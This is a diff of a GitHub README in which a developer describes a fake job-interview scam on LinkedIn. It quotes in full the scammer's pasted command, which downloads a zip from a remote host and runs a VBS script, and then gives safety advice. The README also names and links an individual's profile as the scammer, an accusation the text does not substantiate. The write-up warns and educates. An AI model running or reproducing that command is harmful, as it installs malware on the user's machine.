kavehtehrani/job_interview_scam/README.md

 `curl -k -o "%TEMP%\fixed.zip" "https://auto-ai.online/cam-v-257.fix" && powershell -Command "Expand-Archive -Force -Path '%TEMP%\fixed.zip' -DestinationPath '%TEMP%\fixed'" && wscript "%TEMP%\fixed\update.vbs"`

-Now that my friends, looks sus af.
+Now that my friends, looks sus af 🚨.

 That's the scam.
-A clipboard hijack to "fix your drivers" which would download a zipped payload from auto-ai.online and run on your machine.
-If you want to get into the weeds of what the actual attack might be, then read o below in the [Technical Details](#technical-details)
+A clipboard hijack to "fix your drivers" which would download a zipped payload from a remote server auto-ai.online and run on your machine.

+If you want to get into the weeds of what the actual attack might be, then read on below in the [Technical Details](#technical-details)

 # Final Words

 As of now the profile of our LinkedIn Premium member / aspiring scammer [Aftab Habib](https://www.linkedin.com/in/aftab-habib-965479297/) is still up.
 I presume he'll block me immediately upon seeing this.
-I plan to report his profile to LinkedIn, report to [Galaxy Digital](https://www.linkedin.com/company/galaxyhq) that there are scammers impersonating their staff.
-Lastly I plan to report his bogus registrations to Hostinger see how they respond.
+I plan to report his profile to LinkedIn, report to [Galaxy Digital](https://www.linkedin.com/company/galaxyhq) that there are scammers impersonating their staff (doubt it'll be news to them, however).
+Lastly, I plan to report his bogus registrations to Hostinger see how they respond.

 If you can think of anything else I should be doing, please do let me know!
 I really wish I could've scheduled a video call with Aftab to have a lovely chat about his operation.

-Now if you're read this far, read this section too:
+Now if you've read this far, read this section too:

 # How To Keep Yourself Safe

-This is some general advise I can give you that would be relevant in any online interaction.
+This is some general advise I can give you that would be relevant in any online interaction nowadays:

 - NEVER copy/paste commands from anyone.
 Period.
-If you must, type it in after you thoroughly read it.
-Even running it through an LLM would be a good idea to make sure you didn't miss anything.
+If you must, type it in after you thoroughly inspect it.
+Also running it through an LLM would be a good idea to make sure you didn't miss anything.
 - If someone is reaching out to you on an open platform like LinkedIn or X where any monkey can open an account, only respond if they're able to email you from a legitimate corporate email account.
 Email headers are spoofable as well, but it's a bit more difficult and would be almost impossible to have a back and forth conversation via email.
 - Use reputable job platforms and verify company legitimacy.
 Check the company's website for the actual opening instead of accepting documents or job postings in messages.
 - Be extremely suspicious of "driver updates" or "software installations" during interviews.
-Read a cautionary tale [here](https://slowmist.medium.com/seeing-is-deceiving-analysis-of-fake-zoom-meeting-phishing-attack-3b0138e13e49)
+Read a cautionary tale [here](https://slowmist.medium.com/seeing-is-deceiving-analysis-of-fake-zoom-meeting-phishing-attack-3b0138e13e49).

-"Hacking" used to be predominantly finding vulnerabilities in vulnerable servers.
+"Hacking" used to be predominantly finding vulnerabilities in servers or locally accessible mal-configured devices.
 Now it seems that social engineering is a huge part of the attack surface.
 I am generally super paranoid, but I can see that with some more sophistication even I could've possibly slipped at some point.
 Especially now as audio/video can be faked with AI you need to be super suspicious of interaction even with people you think you know.

 # Technical Details